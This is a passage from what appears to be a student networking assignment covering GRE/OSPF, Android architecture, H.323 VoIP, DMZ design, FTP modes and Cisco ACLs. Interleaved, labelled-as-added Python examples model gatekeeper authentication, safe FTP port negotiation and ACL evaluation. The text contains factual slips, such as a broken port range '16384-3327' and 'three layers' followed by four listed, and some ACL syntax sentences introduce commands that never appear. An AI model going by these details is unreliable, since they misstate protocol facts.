tunnel interface that links to the other router. After this, the tunnel between Router 1 and Router
2 is up.

Figure 7: Configuration of OSPF in Router 1

The third step configures OSPF on Router 1 and adds its network addresses and area.
Figure 8: Configuration of OSPF in Router 2

The last step configures Router 2 with OSPF in the same way as Router 1, but with Router 2's
own network addresses.

After these commands, the GRE tunnel between sender and receiver is built in Cisco Packet
Tracer. The configuration is complete on both sides, and the sender can transmit packets to the
receiver through the GRE tunnel.

3.0 Android Security (Shahzad Hussain TP040954)

3.1 Introduction of Android

Tablets and smartphones become more popular every year, and the operating system on these
devices is as important as the devices themselves. An operating system such as Android runs on
low-powered, battery-driven devices and drives hardware such as Wi-Fi, the camera, lights,
various sensors and the touch screen. Like any operating system, Android provides a
well-defined environment in which applications run. Android applications are written in Java
and run in a virtual machine: they are executed by Dalvik, a core component of the platform,
which runs its own bytecode. The Android Market is the place where users download
applications. Google bought the Android platform from Android Inc. and released it as the
Android Open Source Project. The Open Handset Alliance (OHA) is the consortium behind the
platform; its source code can be freely obtained from a central repository [Goo] and, under the
BSD and Apache licences, can be modified. [Ope17] Android is based on a Linux 2.6 kernel,
which allows it to run effectively and efficiently on mobile devices. Android's focus is always on
optimising the platform for the limited resources of mobile devices. [Lia10]

3.2 Android Architecture

The modified Linux kernel operates as the hardware abstraction layer (HAL), and the Android
architecture runs on three layers: the Application layer, the Libraries layer, and the Linux
Kernel layer, as shown in Figure 1. These layers provide networking functionality, memory
management, process management, and device drivers. [INC17]
Figure 1

The blue items (Application layer) run in the Dalvik Virtual Machine and are written in Java.
The green items (Library layer) are written in C/C++.

3.3 Android Architecture Layers

1. Application Layer

It is the top layer of the Android architecture and contains all the necessary applications such
as the browser, phone, SMS, Google Maps, calendar, and others. These applications are what
the end user interacts with. The Application layer also contains the Application Framework,
whose components developers can extend and reuse through the API. The Application layer
has several managers, such as: [Lia10]

- Activity manager
This manager controls all activities and manages the lifecycle of applications.

- Resource manager
This manager gives access to resources such as graphics.

- Notification manager
This manager displays custom alerts in the status bar for all applications.

- Location manager
This manager handles the geographic location of the user.

- Package manager
This manager retrieves data and information about the packages installed on the device.

- Window manager
This manager creates layouts and views.

- Telephony manager
This manager stores all the information and settings about the network connection and
services on the device.

2. Android Runtime

Android has a DVM (Dalvik Virtual Machine) in which all applications execute. It also
allows the user to run more than one application at the same time. [Lia10]

3. Libraries

The Android libraries are written in C/C++. Applications cannot use these libraries directly;
they are accessed through the Application Framework. They include libraries for video
formats, web libraries used by web browsers, and so on. [Lia10]

4. Linux Kernel
It is the core layer of the Android architecture and provides services such as security,
memory management, and power management, which help the hardware and software
communicate better. [Lia10]

4.0 Voice over Internet Protocol H.323 (Abdulaziz Aljawder TP032807)

4.1 Introduction of Voice Internet Protocol

Voice over Internet Protocol (VoIP) transmission dates back to 1973, when voice over IP was
designed for ARPANET. However, VoIP entered the market in the 1990s as a way to save on
transmission costs by carrying voice over existing data networks. Its aim is to use the
existing LAN and WAN connectivity for voice communications in order to reduce the cost of
public switched telephone network (PSTN) operators for enterprises. At the same time, the
ITU (International Telecommunication Union) advanced H.323 as a recommendation in 1999;
it is an ISDN (Integrated Services Digital Network) style VoIP protocol. In addition, by the
beginning of 2000 the IETF completed the standardisation of an Internet-based VoIP protocol
called SIP.

H.323 has the advantage of serving multiple purposes, including multimedia
communications (data conferencing, video and voice) and applications that must
interoperate with the PSTN. H.323 is designed for communication over an IP network and is
the best way to communicate over a packet-based network.

Since 2006, H.323 has been losing ground: SIP is better suited to IP and web applications
and has therefore become the choice of the Internet community. However, SIP has larger
vulnerabilities that lead to security threats, whereas H.323 has better security. Finally, H.323
is more inclined towards the local network.

4.2 Main Body of Voice over Internet Protocol

VoIP H.323 Protocols

VoIP H.323, also known as “Packet-based multimedia communications systems”, is an
international voice over IP standard defined by the ITU. There are several versions:

Version 1 (1996): multimedia over LAN
Version 2 (1998): telephony over IP
Version 3 (1999): adds communications across administrative domains
Version 4 (2000): adds supplementary services and web-based service creation
Version 5 (2003): adds the use of URLs and DNS, and video conferencing support
Version 6 (2006): adds security authentication

H.323 is not just a standalone protocol, but rather an entire group of protocols. The individual
protocols used under the umbrella of H.323 include:

1. H.225.0 for call signalling

2. Q.931, a protocol borrowed from ISDN, also used for call signalling

3. H.245 for negotiating audio/video channel parameters

4. H.235 for security and authentication

5. RTP, the Real-time Transport Protocol by the IETF, used to transmit audio/video streams

6. H.450.x for additional services like call transfer, call diversion, etc.

4.3 Steps of H.323 Call

Setup:

- First, the terminal registers itself with the gatekeeper using the RAS protocol
(Registration, Admission and Status), sending an ARQ message and receiving an ACF message.
- Using the H.225 protocol (used for setup and arrival of the call), terminal T1 sends a
SETUP message to Terminal 2 asking for a connection. This message contains the IP
address, port and name of the calling client and the IP address and port of the called
client.
- Terminal 2 sends a CALL PROCEEDING message, signalling the attempt to establish
a call.
- Terminal 2 must register with the gatekeeper as T1 did previously.
- Now an alerting message is sent to signal the beginning of the connection.
Control signalling:

At this stage, using H.245 (conference control) messages exchanged between the two
terminals (request and reply), the terminals establish which is master and which is slave,
their capabilities, and the audio and video codecs. When the exchange is complete, the
communication channel (IP address, port) is opened.

The main steps of H.245:

- Terminal Capability Set (TCS): a message sent to announce the capabilities of the
terminals taking part in a call.
- Open Logical Channel (OLC): a message sent to open the logical channel. It contains
the information that allows the reception and coding of the data, including the type of
data that will be sent.

Audio:

- The step that starts the media communication, using the RTP/RTCP protocols.

Call release:

- The calling terminal can initiate the ending process using the Close Logical Channel
and End Session Command messages to finish the call, again using H.245.
- A RELEASE COMPLETE message is sent to stop the connection, using H.225.
- The final step is to unregister the terminals from the gatekeeper, using the RAS
protocol.
H.235 protocols for the security platform in H.323:

H.235.0: Security framework for H-series

- Overview of H.235.x and common procedures with baseline text.

H.235.1: Baseline Security Profile

- Authentication & integrity for H.225.0 signalling using shared secrets.

H.235.2: Signature Security Profile

- Authentication for H.225.0 signalling using X.509 digital certificates and signatures.

H.235.3: Hybrid Security Profile

- Authentication & integrity for H.225.0 signalling using an optimized combination of
X.509 digital certificates, signatures and shared-secret key management; specification
of an optional proxy-based security processor.

H.235.4: Direct and Selective Routed Call Security

- Key management in enterprise and inter-domain environments to obtain key material
for securing H.225.0 call signalling in gatekeeper direct-routed/selective-routed
scenarios.

H.235.5: Framework for secure authentication in RAS

- Secure key agreement (using the EKE/SPEKE approach) in combination with Diffie-Hellman.

H.235.6: Voice encryption profile

- Key management and encryption mechanism for RTP.

H.235.7: Usage of the MIKEY Key Management Protocol for SRTP

- Usage of MIKEY key management for SRTP.

H.235.8: Key Exchange for SRTP using secure signalling channels

- SRTP keying parameter transport over secured signalling channels (IPsec, TLS, CMS).

H.235.9: Security Gateway Support for H.323

- Discovery of H.323 Security Gateways (SG = H.323 NAT/FW ALG) and key
management for H.225.0 signalling.

4.4 VoIP Architecture

The H.323 architecture provides end-to-end signalling such as terminal interconnection and
logical channel establishment, using IP addresses together with TCP/UDP ports (16384-3327)
in particular. An H.323 network consists of at least one zone; a zone is a logical grouping of
H.323 devices managed by a single gatekeeper. Zone boundaries can be drawn along
administrative boundaries, address structure, geography, and so on, and a larger network has
more zones and therefore more gatekeepers, as shown in Figure 3. The following is an example
of an H.323 zone design.

Terminals:

A terminal is a client endpoint on the LAN that supports real-time, two-way communication
with another H.323 entity. Terminals must support voice (audio codecs) as well as signalling
and setup (Q.931, H.245, RAS).
Gateways:

The gateway is the interface between the LAN and the circuit-switched network. It translates
between the communication technologies, handles the design differences between the
networks, call setup and teardown, and the compression and packetisation of voice; an IP/PSTN
gateway is the typical example.

Gatekeepers:

The gatekeeper is the intelligent device of the H.323 architecture and its administration. Each
gatekeeper handles a zone (a group of endpoints, gateways and MCUs). As David shows, it has
the following mandatory features:

- Admission control (verification of the endpoints' authorization to place and
receive calls)
- Address translation = telephone alias -> IP
- Bandwidth control (if required by the call)
- Zone management

Gatekeepers may also implement optional functions and features such as:

- Authorization
- Resource management
- Call control signalling = acts as a rendezvous point also for terminal-to-terminal
signalling (H.245)
- Resource reservation = for endpoints not able to run reservation protocols like
RSVP
- Call management = multimedia calls and complex services
- Gatekeeper management information = remote management via SNMP on
standard MIBs
- Directory services.

Every gatekeeper can act as a signalling proxy and may be the interface towards additional
services; it may also force the media streams to be switched through it, behaving like a
conventional PBX (with the computational and traffic load that implies).
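The call setup in 4.3 starts with RAS admission (ARQ answered by ACF or ARJ), and the mandatory gatekeeper functions listed above (admission control, address translation, bandwidth control), together with the shared-secret authentication of H.235.1, are what decide that answer. The following added Python example (not the assignment's code and not any H.323 stack) models one zone's gatekeeper handling ARQs. It assumes a simplified JSON stand-in for the real ASN.1 RAS encoding; the aliases t1/t2, the addresses and the passwords are constructed. In the style of H.235.1's password-based procedure, each message carries an HMAC-SHA1-96 tag under the endpoint's shared secret, and the timeStamp and random fields are checked to reject stale or replayed requests.

```python
"""H.323 gatekeeper admission (RAS ARQ/ACF/ARJ) with H.235.1-style shared-secret
authentication. Added illustrative example; message format and values are constructed."""
import hashlib
import hmac
import json
import secrets
import time

TAG_LEN = 12            # HMAC-SHA1-96: the 96-bit truncation used by H.235.1
REPLAY_WINDOW_SEC = 30  # acceptable clock drift before a message is treated as stale


def _canonical(msg: dict) -> bytes:
    """Deterministic serialisation of every field except the token itself."""
    body = {k: v for k, v in msg.items() if k != "cryptoToken"}
    return json.dumps(body, sort_keys=True).encode()


def sign_message(msg: dict, password: str) -> dict:
    """Attach an HMAC-SHA1-96 token computed over the message with the shared secret."""
    tag = hmac.new(password.encode(), _canonical(msg), hashlib.sha1).digest()[:TAG_LEN]
    return {**msg, "cryptoToken": tag.hex()}


def make_arq(sender_id: str, dest_alias: str, bandwidth_kbps: int, password: str) -> dict:
    """Admission request from an endpoint; timestamp + random give replay protection."""
    msg = {"type": "ARQ", "sendersID": sender_id, "destinationInfo": dest_alias,
           "bandWidth": bandwidth_kbps, "timeStamp": int(time.time()),
           "random": secrets.randbelow(1 << 31)}
    return sign_message(msg, password)


class Gatekeeper:
    """One zone: registration table, per-endpoint secrets, bandwidth pool, replay cache."""

    def __init__(self, zone_bandwidth_kbps: int):
        self.registered = {}     # alias -> (ip, port) call-signalling address, from RRQ
        self.passwords = {}      # alias -> shared secret used for H.235.1 authentication
        self.bandwidth_left = zone_bandwidth_kbps
        self.seen = set()        # (sendersID, timeStamp, random) triples already accepted

    def register(self, alias: str, ip: str, port: int, password: str) -> None:
        self.registered[alias] = (ip, port)
        self.passwords[alias] = password

    def _authentic(self, msg: dict) -> bool:
        password = self.passwords.get(msg.get("sendersID"))
        if password is None or "cryptoToken" not in msg:
            return False
        expected = hmac.new(password.encode(), _canonical(msg), hashlib.sha1).digest()[:TAG_LEN]
        return hmac.compare_digest(expected, bytes.fromhex(msg["cryptoToken"]))

    @staticmethod
    def _reject(reason: str) -> dict:
        return {"type": "ARJ", "rejectReason": reason}

    def handle_arq(self, msg: dict, now=None) -> dict:
        """Return an ACF (with the resolved address) or an ARJ with a reject reason."""
        now = time.time() if now is None else now
        if msg.get("type") != "ARQ" or msg.get("sendersID") not in self.registered:
            return self._reject("callerNotRegistered")
        if not self._authentic(msg):                         # H.235.1: integrity + authentication
            return self._reject("securityDenial")
        if abs(now - msg["timeStamp"]) > REPLAY_WINDOW_SEC:  # stale timestamp
            return self._reject("securityDenial")
        key = (msg["sendersID"], msg["timeStamp"], msg["random"])
        if key in self.seen:                                 # replayed message
            return self._reject("securityDenial")
        if msg["destinationInfo"] not in self.registered:    # address translation failed
            return self._reject("calledPartyNotRegistered")
        if msg["bandWidth"] > self.bandwidth_left:           # bandwidth control
            return self._reject("requestDenied")
        self.seen.add(key)
        self.bandwidth_left -= msg["bandWidth"]
        ip, port = self.registered[msg["destinationInfo"]]   # alias -> IP translation
        return {"type": "ACF", "bandWidth": msg["bandWidth"],
                "destCallSignalAddress": {"ip": ip, "port": port}}


if __name__ == "__main__":
    gk = Gatekeeper(zone_bandwidth_kbps=256)
    gk.register("t1", "192.0.2.10", 1720, "t1-secret")
    gk.register("t2", "192.0.2.20", 1720, "t2-secret")
    arq = make_arq("t1", "t2", 128, "t1-secret")
    print(gk.handle_arq(arq))     # ACF with t2's call-signalling address
    print(gk.handle_arq(arq))     # same message again: ARJ securityDenial (replay)
```

The order of the checks matters for the defender: authentication is verified before any resource (bandwidth) is consumed or any registered address is disclosed, so an unauthenticated sender learns nothing beyond "securityDenial".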

4.5 Multipoint Control Unit (MCU)

An MCU (Multipoint Control Unit) is an endpoint that supports conferences between three or
more endpoints. It can be a standalone device such as a PC, or be integrated into a gateway,
gatekeeper or terminal, and it consists of a Multipoint Controller (MC) and a Multipoint
Processor (MP):

- MC = handles control and signalling for conference support
- MP = receives streams from endpoints, processes them, and returns them to
the endpoints in the conference.

VoIP H.323 gateways configuration:

Figure: Configuration of Gateway1, Gateway2, Gatekeeper 1 and Gatekeeper2

VoIP H.323 vs VoIP SIP:

Figure: Comparison of VoIP H.323 vs VoIP SIP
4.6 Conclusion of VoIP

H.323 and SIP each have advantages and disadvantages. Unlike H.323, SIP leaves the details
of feature implementation to the developer, which gives great flexibility in designing or using
the protocol. SIP is also simpler than H.323: it requires fewer messages to set up a session.
H.323 requires a relatively large number of message exchanges to set up and manage
sessions, but it is also highly reliable and secure. Thanks to the flexibility and scalability of
SIP, it quickly gained momentum among the early adopters of today's booming IP telephony
systems. H.323 also has a tightly defined service implementation, and all instances of H.323
can support H.323 across firewalls. In addition, VoIP H.323 still requires some of the
traditional providers. Finally, H.323 needs considerable flexibility and performance
improvements, as well as the additional security options included in H.235.

Group Part

Question 1
In networks, the local area network is normally separated from untrusted networks such as
the Internet by a demilitarized zone (DMZ), which is a physical or logical subnetwork.
External-facing servers are placed in the DMZ; the internal LAN remains unreachable from
the Internet, and only the services and resources located in the DMZ are exposed. This
additional layer blocks hackers from gaining direct access to the LAN from the Internet.
(Cobb, 2012)
The DMZ hosts the services offered to users on the Internet, basically services such as
Web, Mail, DNS, FTP, and VoIP. Hackers can reach those services in the DMZ, so the DMZ
needs stronger defences against constant attack. (Cobb, 2012)

A DMZ can be designed in a few ways; the two common methods use a single firewall or dual
firewalls, and the choice depends on the network requirements. A single-firewall design needs
at least three network interfaces to create a network architecture containing a DMZ: the first
interface, from the ISP to the firewall, forms the external network; the second network
interface forms the internal network; and the third forms the DMZ. (Cobb, 2012)

Another, more secure method creates the DMZ with two firewalls. The first firewall is
configured to allow only traffic destined for the DMZ, and the internal network receives
traffic from the DMZ only through the second, internal firewall. Two firewalls are considered
more secure because an attacker would have to compromise two devices before gaining
access to the internal LAN. For example, a network intrusion detection and prevention system
located in a DMZ that contains only a Web server can block all traffic except HTTP and
HTTPS requests on ports 80 and 443. (Cobb, 2012)
As network security specialists, we recommend the Cisco ASA 5500-X with Firepower
Services, a model that stays more secure. This NGFW has earned the highest security
effectiveness scores in third-party testing for both NGIPS and AMP, blocking 99.4% and
99.2% of threats, respectively. It gives visibility into and control over activity across the
network, with insight into users, apps, devices, threats, files, and vulnerabilities. It extends
protection from the data centre to mobile devices, and its integrated approach to threat defense
reduces capital and operating costs as well as administrative complexity by consolidating
multiple security services in a single platform. It automates security tasks to increase agility
and speed remediation. (Cisco, 2017)

Question 2
The File Transfer Protocol (FTP) is basically for transferring files from one computer to
another over a network or the Internet. The company therefore requires FTP with a username
and password for each transaction, so that these clients can put and get files on the same
server through FTP. Transferring from a server to a client computer is called “downloading”
and transferring files from a client computer to a server is called “uploading”, as shown in
Figure 2 below (DeskShare, 2009).
Figure 2: FTP Protocol

There are certain requirements for using FTP (DeskShare, 2009):

1. An FTP client such as Auto FTP Manager should be installed on the client computer.
2. The client needs some information about the FTP server it wants to connect to. The
FTP server address must be typed in; it looks like any other website address, such as
ftp.abc.net, or it can be a numeric address such as “68.175.255.84”.
3. A username and password are required, but some FTP servers let users/clients
connect anonymously without a username and password.

Internet Connection and FTP

FTP has a standard port number on which FTP servers listen for connections, and it uses
commands for receiving and sending data. A port is a logical connection point for
communication using the Internet Protocol (IP). FTP servers use the standard port number 21
only for commands, so it is referred to as the command port. For instance, when the FTP
server sends the list of all files and folders present on the server, a second connection port is
used to transfer the data; this is called the data port (DeskShare, 2009).

Passive and Active Connection Mode

An FTP server can support passive or active connections, or sometimes both. When the FTP
connection is active, the client opens a port and listens on it, and the server actively connects
to it. A client or user must have Auto FTP Manager access to the Internet to choose the correct
type of FTP connection mode.

1. Passive Mode

Using passive mode is always an advantage because most FTP servers support it. For a
passive FTP connection, the administrator must configure the firewall to accept connections
to any of the ports that the FTP server opens, as shown in Figure 5 below. When the FTP
client has opened the two Internet connections, one for data and another for commands,
communication with the FTP server has started. Then folders and files can be transferred
between the two connected computers with Auto FTP Manager (DeskShare, 2009).

Figure 5: Passive FTP

2. Active Mode

Active mode is only usable when the firewall can be set to accept connections to the port that
the FTP client opens. That is why many Internet service providers block incoming
connections to all ports above 1024. As the data port, active FTP normally uses port 20
(DeskShare, 2009).
Figure 6: Active FTP
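The difference between the two modes comes down to which side opens the data connection and how that port is communicated on the control channel: the server's 227 reply in passive mode, the client's PORT command in active mode. The following added Python example (not the assignment's code and not Auto FTP Manager's) parses and builds those messages, decoding the six comma-separated numbers into an address and a port (p1*256 + p2), and applies the checks a firewall-aware client or server should make: only unprivileged ports, and only the peer already on the control connection, so that neither side can be talked into opening a data connection to a third host. The addresses and ports are constructed.

```python
"""FTP data-connection negotiation: PASV replies and PORT commands.

Added illustrative example with constructed addresses; not from the assignment.
"""
import re

# 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)
PASV_RE = re.compile(r"^227 .*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")
# PORT h1,h2,h3,h4,p1,p2
PORT_RE = re.compile(r"^PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$")


def _decode_hostport(fields):
    """Turn the six decimal fields into ('a.b.c.d', port) with port = p1*256 + p2."""
    h1, h2, h3, h4, p1, p2 = (int(x) for x in fields)
    if any(v > 255 for v in (h1, h2, h3, h4, p1, p2)):
        raise ValueError("octet out of range")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def parse_pasv_reply(reply: str, control_peer_ip: str):
    """Passive mode: where the client should connect for the data channel.

    Checks: the reply must be a 227, the data port must be unprivileged, and the
    advertised address must be the server we already talk to on the control
    connection, so the server cannot redirect us to another host."""
    m = PASV_RE.match(reply)
    if not m:
        raise ValueError("not a 227 passive-mode reply")
    ip, port = _decode_hostport(m.groups())
    if port <= 1023:
        raise ValueError("server offered a privileged data port")
    if ip != control_peer_ip:
        raise ValueError(f"PASV address {ip} differs from control peer {control_peer_ip}")
    return ip, port


def pasv_reply_is_safe(reply: str, control_peer_ip: str) -> bool:
    try:
        parse_pasv_reply(reply, control_peer_ip)
        return True
    except ValueError:
        return False


def build_port_command(client_ip: str, listen_port: int) -> str:
    """Active mode: tell the server which client address and port to connect back to."""
    if not 1024 <= listen_port <= 65535:
        raise ValueError("listening port must be unprivileged")
    octets = client_ip.split(".")
    if len(octets) != 4 or any(not o.isdigit() or int(o) > 255 for o in octets):
        raise ValueError("bad IPv4 address")
    return "PORT " + ",".join(octets + [str(listen_port // 256), str(listen_port % 256)])


def parse_port_command(line: str, control_peer_ip: str):
    """Server side of active mode: only connect back to the client itself, on an unprivileged port."""
    m = PORT_RE.match(line)
    if not m:
        raise ValueError("malformed PORT command")
    ip, port = _decode_hostport(m.groups())
    if ip != control_peer_ip or port <= 1023:
        raise ValueError("refusing PORT to a third host or a privileged port")
    return ip, port


def port_command_is_safe(line: str, control_peer_ip: str) -> bool:
    try:
        parse_port_command(line, control_peer_ip)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed exchange: server 192.168.1.5 answers PASV, client 10.0.0.7 sends PORT.
    print(parse_pasv_reply("227 Entering Passive Mode (192,168,1,5,195,80).", "192.168.1.5"))
    print(build_port_command("10.0.0.7", 50000))
```

In passive mode the client makes both TCP connections outbound, which is why it passes through client-side firewalls and NAT; in active mode the server connects back from port 20, which is the inbound connection above port 1024 that the text says providers often block.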

Question 3

Engineering and IT workstations must be able to access the Internet (to reach APIIT Sri
Lanka) over HTTP and HTTPS, with DNS. No other protocol access to the Internet is
allowed. Before connecting to the Internet, the access requests from those workstations have
to pass through the DMZ to the firewall. The firewall then allows or denies each request based
on the list worked out in the access control list.
Basically, ACLs come in two types: standard ACLs and extended ACLs. A standard ACL
controls traffic by comparing the source address of the IP packets to the addresses configured
in the ACL. (Wilson, 2012)

The workstations in engineering and sales should be able to access the Internet over HTTP
and HTTPS; no other protocol is allowed to access the Internet. This means workstations in
sales and engineering have to send their access requests through the DMZ and then to the
firewall before connecting to the Internet. Therefore, the access control list determines which
requests are allowed or denied at the firewall.

There are two types of ACLs, standard ACLs and extended ACLs. The standard ACL is the
oldest form of ACL and controls traffic by comparing the source address of the IP packets to
the addresses configured in the ACL. The command syntax for a standard ACL is: (Wilson,
2012)

To control traffic with an extended ACL, both the source and the destination addresses of the
IP packets are compared with the addresses configured in the ACL. The command syntax
format of an extended ACL is written below:
The ACL used in the DMZ, with the aim of controlling the traffic, needs a few rules applied
using the permit and deny commands. Below is an example of the permit and deny commands:

When requests from the workstation clients arrive at the same time, the ACLs on the firewall
interface have to ensure that the IP addresses of both workstations are granted access to the
Internet by the firewall. When a workstation sends a request that is granted access at the
firewall, the request is carried forward to the Internet through the firewall. The ACL blocks
access to any port when any other protocol or packet tries to get through to the Internet. The
ACL first matches the request from the client against the configured conditions before
denying it if it differs from the configured requirements. The denied request is then dropped,
or passed on to the next statement condition in the ACL. (Wilson, 2012)
Question 4
In the scenario, the client workstations of sales, engineering and finance must be able to
access e-mail and the mail server in the DMZ. The design in Figure 4 below shows that a
client workstation can send requests to the mail server to check its mail. Such requests need
to go through the firewall and the DMZ to reach the mail server, and the mail server's reply
packets return to the client workstations passing through the DMZ and the firewall.

Figure 4: Design of the company

Email Servers

E-mail servers are commonly overlooked when it comes to securing the network, because
e-mail is normally what mobile workers most want to access, and it is easy to forward the
appropriate ports straight to the internal mail server on the most trusted network rather than
placing it on the secure side of the DMZ.

The practice of forwarding ports can be avoided by considering the type of information kept
inside the mail server. A mail front-end and proxy services should be in place to make sure
the primary mail server is not directly exposed to external networks. Incoming mail should go
through the DMZ security to be scanned for any type of threat and spam, to make sure it is
delivered to the right network. Web-based e-mail is easily accessible, which is why a solid
reverse-proxy configuration should be deployed to keep the web-based front end away from
the untrusted networks and to restrict the mail services to authenticated workers (McKeag,
2004).
An extended ACL configuration is required to secure the DMZ behind a protected gateway.
To check mail, certain rules must be applied in the firewall so that client workstations can
send their requests to check e-mail, and the server must be configured to accept and allow
access between the mail server and the clients' workstations.

For the configuration, there are five steps which need to be followed (Byrd, 2009):

1. Enter the e-mail and web server IP addresses on the firewall interface to allow the
requests sent to the firewall.
2. On the firewall interface, enter the ACL commands at the command prompt.
3. Add multiple entries in the ACL because several clients will be checking their
e-mail. Permit only Simple Mail Transfer Protocol (SMTP) packets for the
communication between the mail server and the client workstations.
4. Set the destination address and the source port.
5. Set the packet filtering to deny or permit on matching the protocol, source,
destination address, and port of the packets.

Question 5
SMTP (Simple Mail Transfer Protocol) is the TCP/IP protocol used for sending and receiving
e-mail. However, because it is limited in its ability to queue messages at the receiving end, it
is typically used together with one of two other protocols, POP3 or IMAP, which let the
client keep messages in a server mailbox and periodically download them from the server. In
other words, users typically use a program that uses SMTP to send e-mail and POP3 or IMAP
to receive e-mail. On Unix-based systems, sendmail is the most commonly used SMTP
server; commercial bundles of sendmail include a POP3 server. Microsoft Exchange
integrates an SMTP server and can also be set up to include POP3 support.

Configuration:

The configuration is implemented on the e-mail server, with mail configuration on each user
workstation in Company B and Company A.

Step (1): sending e-mail to the engineering department from the finance department

Step (2): the mail from the finance department has been received successfully by the
engineering department

Solution:
Use the Simple Mail Transfer Protocol (SMTP) on the company's e-mail server to send and
receive messages between users of the same or different companies. To deliver e-mail from
the finance department to the engineering department on the company's internal network, the
SMTP server on the e-mail server must be enabled. The mail from the finance department
then reaches the engineering department.
Question 6

The sales, engineering and finance departments cannot access the other departments' clients
while sending a PDU from a client PC to the APIIT Sri Lanka IT Department PC. An access
list can be used to block (deny) all client PCs except the APIIT IT Department. The
configuration prevents the router from forwarding such traffic through the other router, which
means the APIIT IT Department PC cannot receive access requests from the PCs of the other
departments. The router implements the access-list commands at its command prompt so that
other PCs cannot directly access it without permission.

A standard access list (ACL) can permit or deny traffic from another network protocol
reaching a department's network through the router. The ACL is based on the IP address and
checks the network traffic in Cisco Packet Tracer. A standard access list is created with a
number from 1 to 99, typed at the router's command prompt, and the result can then be checked.

The ACL should be suitable for the APIIT Sri Lanka IT Department to deny access to the
service. The three departments can only send packets through the APIIT router. The APIIT
router analyses the packets from the other networks and checks their permission. If the router
has been configured with an access-list command that denies all other traffic from reaching
the client PC, the router will prevent that traffic from accessing the APIIT Sri Lanka IT
Department.

The router identifies traffic by the IP addresses configured in the list; another router with a
different IP address could still reach the IT Department, so it must be ensured that the router
carrying the deny command prevents the other routers from gaining access. The router being
configured must know the other routers' IP addresses in order to deny the service. During
configuration, the router checks each packet: if the command was applied successfully, it
rejects the packet, which means the packet fails to get through.
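Questions 3, 4 and 6 all come down to writing standard or extended ACL entries and predicting what the router does with a given packet. The following added Python example (not the assignment's own configuration and not Cisco IOS) parses IOS-style numbered ACL lines and evaluates packets against them with wildcard masks, first-match order and the implicit deny at the end of every list. The department networks, the DMZ mail server address 172.16.1.25 and the ACL numbers 110 and 10 are constructed assumptions for this scenario, not values from the assignment.

```python
"""Cisco-style standard/extended ACL evaluator: wildcard masks, first match, implicit deny.

Added illustrative example; addresses, ACL numbers and rules are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple

ANY = (0, 0xFFFFFFFF)   # base address 0 with an all-ones wildcard matches everything


@dataclass
class Packet:
    proto: str          # "tcp", "udp", "icmp" or "ip"
    src: str
    dst: str
    sport: int = 0
    dport: int = 0


@dataclass
class ACE:
    action: str                   # "permit" or "deny"
    proto: str                    # "ip" matches any protocol
    src: Tuple[int, int]          # (address, wildcard); 0 bits in the wildcard must match
    dst: Tuple[int, int]
    sport: Optional[int] = None   # None means any port
    dport: Optional[int] = None


def _ip(text: str) -> int:
    return int(ipaddress.IPv4Address(text))


def _parse_addr(tokens, i):
    """Consume 'any' | 'host A.B.C.D' | 'A.B.C.D [W.W.W.W]' starting at tokens[i]."""
    if tokens[i] == "any":
        return ANY, i + 1
    if tokens[i] == "host":
        return (_ip(tokens[i + 1]), 0), i + 2
    base = _ip(tokens[i])
    if i + 1 < len(tokens) and tokens[i + 1].count(".") == 3:
        return (base, _ip(tokens[i + 1])), i + 2
    return (base, 0), i + 1     # bare address in a standard ACL means a single host


def _parse_port(tokens, i):
    if i < len(tokens) and tokens[i] == "eq":
        return int(tokens[i + 1]), i + 2
    return None, i


def parse_ace(line: str) -> ACE:
    """Parse one 'access-list N permit|deny ...' line in IOS numbered-ACL syntax."""
    t = line.split()
    if t[0] != "access-list" or t[2] not in ("permit", "deny"):
        raise ValueError(f"not an access-list entry: {line}")
    number, action = int(t[1]), t[2]
    if 1 <= number <= 99 or 1300 <= number <= 1999:   # standard ACL: source only
        src, _ = _parse_addr(t, 3)
        return ACE(action, "ip", src, ANY)
    proto = t[3]                                      # extended: proto src [eq] dst [eq]
    src, i = _parse_addr(t, 4)
    sport, i = _parse_port(t, i)
    dst, i = _parse_addr(t, i)
    dport, i = _parse_port(t, i)
    return ACE(action, proto, src, dst, sport, dport)


def _addr_match(spec, addr: str) -> bool:
    base, wildcard = spec
    return ((base ^ _ip(addr)) & ~wildcard & 0xFFFFFFFF) == 0


def matches(ace: ACE, pkt: Packet) -> bool:
    if ace.proto != "ip" and ace.proto != pkt.proto:
        return False
    if not (_addr_match(ace.src, pkt.src) and _addr_match(ace.dst, pkt.dst)):
        return False
    if ace.sport is not None and ace.sport != pkt.sport:
        return False
    return ace.dport is None or ace.dport == pkt.dport


def evaluate(acl_lines, pkt: Packet) -> str:
    """First matching entry wins; no match means the implicit 'deny any' at the end."""
    for ace in (parse_ace(line) for line in acl_lines):
        if matches(ace, pkt):
            return ace.action
    return "deny"


# Constructed addressing: engineering 192.168.10.0/24, sales 192.168.20.0/24,
# finance 192.168.30.0/24, DMZ mail server 172.16.1.25. Questions 3 and 4:
# web + DNS for engineering and sales, SMTP to the DMZ mail server for everyone.
INTERNET_ACL = [
    "access-list 110 permit tcp 192.168.10.0 0.0.0.255 any eq 80",
    "access-list 110 permit tcp 192.168.10.0 0.0.0.255 any eq 443",
    "access-list 110 permit udp 192.168.10.0 0.0.0.255 any eq 53",
    "access-list 110 permit tcp 192.168.20.0 0.0.0.255 any eq 80",
    "access-list 110 permit tcp 192.168.20.0 0.0.0.255 any eq 443",
    "access-list 110 permit udp 192.168.20.0 0.0.0.255 any eq 53",
    "access-list 110 permit tcp 192.168.0.0 0.0.255.255 host 172.16.1.25 eq 25",
    "access-list 110 deny ip any any",   # explicit, so the router shows hit counts for it
]

# Question 6: standard ACL (1-99) on the APIIT router admitting only the constructed
# APIIT IT Department network 192.168.40.0/24.
APIIT_ACL = [
    "access-list 10 permit 192.168.40.0 0.0.0.255",
    "access-list 10 deny any",
]

if __name__ == "__main__":
    for p in (Packet("tcp", "192.168.10.5", "203.0.113.10", 40000, 443),
              Packet("tcp", "192.168.10.5", "203.0.113.10", 40000, 22)):
        print(p, "->", evaluate(INTERNET_ACL, p))
```

Two points the evaluator makes visible: the order of entries matters because the first match wins, and an empty or exhausted list denies, so a forgotten permit silently drops traffic rather than letting it through.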
Question 7
